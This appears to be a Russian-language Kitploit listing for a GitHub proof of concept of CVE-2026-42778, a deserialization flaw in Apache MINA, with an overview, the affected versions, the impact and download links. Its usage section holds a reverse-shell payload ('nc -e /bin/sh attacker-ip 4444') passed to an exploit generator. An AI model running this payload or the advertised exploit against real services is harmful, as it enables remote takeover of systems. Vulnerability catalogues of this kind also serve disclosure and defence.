Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 Десериализация недоверенных данных (CWE-502) | Kitploit
Инструменты/GitHubGitHub/akinfue/cve-2026-42778-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 Десериализация недоверенных данных (CWE-502)

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-42778

Обзор

Неполное исправление в методе AbstractIoBuffer.getObject() в Apache MINA. Проверка разрешённого списка имён классов, которая ограничивает, какие классы могут быть десериализованы, применяется слишком поздно — после того, как статические инициализаторы в читаемых классах могли уже выполниться. Это происходит потому, что исходное исправление для CVE-2024-52046 не было должным образом применено к веткам 2.1.X и 2.2.X. Затронутые версии: - Apache MINA 2.1.0 – 2.1.11 - Apache MINA 2.2.0 – 2.2.6

Эксплойт:

Скачать здесь

Детали

  • ID CVE: CVE-2026-42778

  • Опубликовано: 05.01.2026

  • Воздействие: Критическое

  • Доступность эксплойта: Не публичный, только приватный.

  • CVSS: 9.8

  • Патч доступен: (Официального патча пока нет)

Воздействие

Злоумышленник может создать вредоносные сериализованные объекты, которые при обработке методом IoBuffer.getObject() выполняют произвольный код через статические инициализаторы до того, как произойдёт проверка разрешённого списка имён классов. Поскольку это уязвимость, доступная по сети и не требующая привилегий или взаимодействия с пользователем, возможно удалённое выполнение кода в любом приложении, использующем Apache MINA и вызывающем метод IoBuffer.getObject(). Уязвимость позволяет полностью скомпрометировать конфиденциальность, целостность и доступность затронутых систем.

Затронутые версии

  • Apache MINA 2.1.0 – 2.1.11
  • Apache MINA 2.2.0 – 2.2.6

Использование

root@kitploit:~
# Компиляция и генерация
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# Отправка по сети в службу на основе MINA с использованием ObjectSerializationCodecFactory
# или в любую конечную точку, которая вызывает IoBuffer.getObject()

Контакты

  • По вопросам обращайтесь:[email protected]
  • Эксплойт : здесь
Скачать инструмент